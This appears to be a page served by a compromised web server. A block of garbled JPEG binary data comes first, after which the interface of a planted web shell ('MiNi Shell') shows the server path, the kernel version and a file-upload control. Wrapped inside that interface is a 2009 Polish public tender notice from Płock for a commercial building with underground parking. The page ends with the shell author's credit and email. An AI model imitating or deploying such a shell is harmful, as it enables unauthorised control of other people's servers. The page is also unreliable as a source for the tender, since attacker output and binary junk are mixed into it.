JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090826/140127-N-2009.html

<p class="kh_header"><b>Płock: Budowa budynku handlowo-usługowego z parkingiem podziemnym przy ul. Synagogalnej w Płocku.</b><br>
<b>Numer ogłoszenia: 140127 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rewitalizacji Starówki ARS Spółka z o.o. , ul. Stary Rynek 19, 09-400 Płock, woj. mazowieckie, tel. 024 3666150, faks 024 3666150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ars.plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku handlowo-usługowego z parkingiem podziemnym przy ul. Synagogalnej w Płocku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane obejmujące budowę budynku handlowo-usługowego z parkingiem podziemnym wraz z wewnętrznymi instalacjami: elektryczną, wodociągową, kanalizyjną, ciepłej wody użytkowej, centralnego ogrzewania, wentylacji, klimatyzacji, zlokalizowanego w Płocku przy ul. Synagogalnej, na działce o numerze ewidencyjnym gruntu 1385/2, obiektu położonego na obszarze zespołu urbanistyczno-architektonicznego i warstw kulturowych miasta Płocka, wpisanego w dn. 16.11.1959 r. do rejestru zabytków dawnego województwa płockiego pod nr 51/182/59 W.Pow. zabudowy - 809 m2, pow. użytkowa 3474 m2, kubatura - 14100 m3..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.21.31.12-1, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wadium 250000.00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia tzn. prowadzoną działalność gospodarczą w ww zakresie zarejestrowaną                    w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia, tzn.:

1)	Wykonawca musi dysponować osobami posiadającymi kwalifikacje odpowiednie                       do stanowisk, które zostaną im powierzone lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, tj.:
a)	Kierownik budowy - osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej i min 5 lat doświadczenia na danym stanowisku, 
b)	Kierownik robót elektrycznych - osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji elektrycznych i min 5 lat doświadczenia na danym stanowisku, 
c)	Kierownik robót sanitarnych- osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji wentylacyjnych, wodociągowych i kanalizacyjnych i instalacji gazowych i min 5 lat doświadczenia na danym stanowisku, 
d)	Archeolog- osoba spełniająca wymogi wymienione w § 10.1.  Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych ( Dz. U. Nr 150 poz. 1579)
2)	Osoby wymienione w ust 2 pkt 1 lit a, b, c,  winny posiadać uprawnienia budowlane bez ograniczeń do kierowania robotami/budową w specjalności właściwej dla powierzonych stanowisk  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów - wystarczające co do zakresu rzeczowego przedmiotowego postępowania, a kierownik budowy wykaże się dodatkowo co najmniej 2 - letnią praktyką zawodową na budowie przy zabytkach nieruchomych (zgodnie z Rozporządzeniem Ministra Kultury z dnia 09-06-2004r.  § 8 ust. 1 - Dz. U. z 2004r. Nr 150, poz. 1579). 
Osoby wymienione w ust 2 pkt 1 lit a, b, c  muszą być również członkami odpowiedniej izby samorządu zawodowego inżynierów budownictwa, co należy potwierdzić zaświadczeniem wydanym przez tę izbę (z datą ważności w momencie składania ofert).

3)	Wykonawca musi wykazać, że posiada  doświadczenie zawodowe niezbędne do wykonania zamówienia, tj.: zrealizował w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jako Główny Wykonawca lub Partner Konsorcjum co najmniej 1 zadanie o wartości minimalnej 10 mln zł netto, lub 3 zadania o wartości łącznej 15 mln zł netto, odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia   dotyczące obiektu usługowego lub mieszkalno - usługowego, umiejscowionego na terenie objętym ochroną konserwatorską.

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
1)	wykażą, że osiągnęli w ciągu ostatnich trzech lat obrotowych średnioroczny przychód netto w branży budowlano-  montażowej w wysokości nie mniejszej niż 20 000.000,00 zł  ( słownie: dwadzieścia milionów złotych),
2)	przedłożą bilans oraz rachunek zysków i strat za lata 2006, 2007 i 2008,  a w przypadku Wykonawców nie zobowiązanych do sporządzania bilansu, informację określającą obroty, zysk albo straty oraz zobowiązania i należności za lata 2006, 2007, 2008. Jeżeli okres działalności jest krótszy - Wykonawca zobowiązany jest przedstawić informację  za ten okres,
3)	dysponują środkami finansowymi lub posiadają zdolność kredytową nie mniejszą niż 100% ceny ofertowej (brutto);

4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art. 24 ust. 1 pkt. 1-10 oraz art. 24 ust. 2 pkt. 1-4 ustawy - Prawo zamówień publicznych.

Wykonawcy wspólnie ubiegający się  o udzielenie niniejszego zamówienia muszą wykazać, że:
a)	warunek określony w pkt.  1 spełnia każdy z Wykonawców,
b)	warunek określony w pkt. 2 ppkt 1 a, b, c, d,  i ppkt 2 spełniają łącznie wszyscy Wykonawcy,
c)	warunek określony w pkt. 3 spełniają łącznie wszyscy Wykonawcy,
d)	warunek określony w pkt. 4  spełnia każdy z Wykonawców.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia- nie spełnia, na podstawie dokumentów wymienionych w Rozdziale VI..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Do oferty należy załączyć następujące oświadczenia i dokumenty w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Załącznik  Nr 2 do SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do  ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
3.	Aktualną informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1             pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert (powyższa informacja dotyczy osób fizycznych).
4.	Aktualną informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1    pkt. 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (powyższa informacja dotyczy podmiotów zbiorowych): np. w przypadku spółki z ograniczoną odpowiedzialnością, Wykonawca załącza informacje z KRK dotyczące każdego członka Zarządu oraz informacje z KRK dotyczące Spółki.
5.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie             w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2, 4, 5  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzających odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne  i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
7.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 3  - składa zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy.
8.	Dokumenty, o których mowa w pkt. 6 litera a i c oraz w pkt. 7, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 6 litera b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 6 i 7, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Pkt. 8 stosuje się odpowiednio.
10.	Wykaz  robót budowlanych  wykonanych na terenie objętym ochroną konserwatorską  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, dotyczące obiektu usługowego lub mieszkalno- usługowego (co najmniej 1 zadanie o wartości minimalnej 10 mln zł netto, lub 3 zadań o wartości łącznej 15 mln zł netto).Do wykazu należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie - Załącznik Nr 3.
11.	Wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - Załącznik Nr 4 a do SIWZ. Należy również załączyć dokumenty stwierdzające, że osoba-y, które będą pełnić funkcje techniczne posiadają wymagane uprawnienia budowlane oraz są wpisane na listę członków Okręgowej  Izby Inżynierów Budownictwa i posiadają wymagane ubezpieczenie od odpowiedzialności cywilnej jak również pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa, wykonawca wskazał osoby, którymi będzie dysponował. 
12.	Informacje dotyczące Podwykonawców -  Załącznik Nr 4 b do SIWZ. Jeżeli Wykonawca nie przewiduje zatrudnienia Podwykonawców wpisuje nie dotyczy. W przypadku wypełnienia przez Wykonawcę Załącznik Nr 4b należy dołączyć również aktualny dokument dopuszczający do obrotu prawnego podwykonawcę w zakresie, który będzie przez niego realizowany.
13.	Informację, że  osiągnęli w ciągu ostatnich trzech lat obrotowych średnioroczny przychód netto w branży budowlano-  montażowej w wysokości nie mniejszej niż 20 000.000,00 zł. (w przypadku podmiotów występujących wspólnie przychody netto wszystkich podmiotów powinny zostać zsumowane) - Załącznik Nr 6.
14.	Bilans oraz rachunek zysków i strat za lata 2006, 2007, 2008 a w przypadku Wykonawców, nie zobowiązanych, do sporządzania bilansu, informację określającą obroty, zysk albo straty oraz zobowiązania i należności za lata 2006, 2007, 2008. Jeżeli okres działalności jest krótszy - za ten okres.
15.	Informację banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż 100% ceny ofertowej brutto, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
UWAGA: z informacji banku winna wynikać konkretna kwota zdolności kredytowej lub posiadanych środków finansowych.
Do oferty należy załączyć również:
16.Wypełniony formularz oferty do Specyfikacji Istotnych Warunków Zamówienia podający cenę ryczałtową- Załącznik Nr 1 do SIWZ.
17. Wypełniony formularz Tabela Rozliczeniowa Elementów Scalonych - Załącznik Nr 5 do SIWZ.
18. Harmonogram rzeczowo - finansowy .
19. Parafowany wzór umowy,
20. Dowód wniesienia wadium. Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału.
21. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów. Załączone do oferty pełnomocnictwo powinno być w formie oryginału lub kopii poświadczonej notarialnie.
22. W przypadku złożenia oferty wspólnej:
   - Wykonawcy występujący wspólnie muszą upoważnić jednego spośród siebie jako  przedstawiciela pozostałych - lidera do zaciągania zobowiązań i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez pozostałych Wykonawców lub ich uprawnionych przedstawicieli.
W powyższym przypadku Wykonawcy winni złożyć zgodne oświadczenie woli dotyczące wskazania podmiotu  i jego  rachunku bankowego, przez który   przeprowadzane będą wszystkie operacje finansowe związane  z przedmiotem zamówienia.
Dokumenty, o których mowa w ust. 1-5  winien załączyć każdy z Wykonawców składających ofertę wspólną.
Dokumenty są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.

Wykonawca, którego oferta została uznana za najkorzystniejsza zobowiązany jest dostarczyć Zamawiającemu, 7 dni po zawarciu umowy kosztorys sporządzony metodą szczegółową , zgodny z tabelą rozliczeniowych elementów scalonych oraz harmonogramem rzeczowo finansowym..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ars.plock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rewitalizacji Starówki ARS Spółka z o.o., 09-400 Płock, Stary Rynek 19.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2009 godzina 10:00, miejsce: Agencja Rewitalizacji Starówki ARS Spółka  z o.o., 09-400 Płock, Stary Rynek 19, I piętro, pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com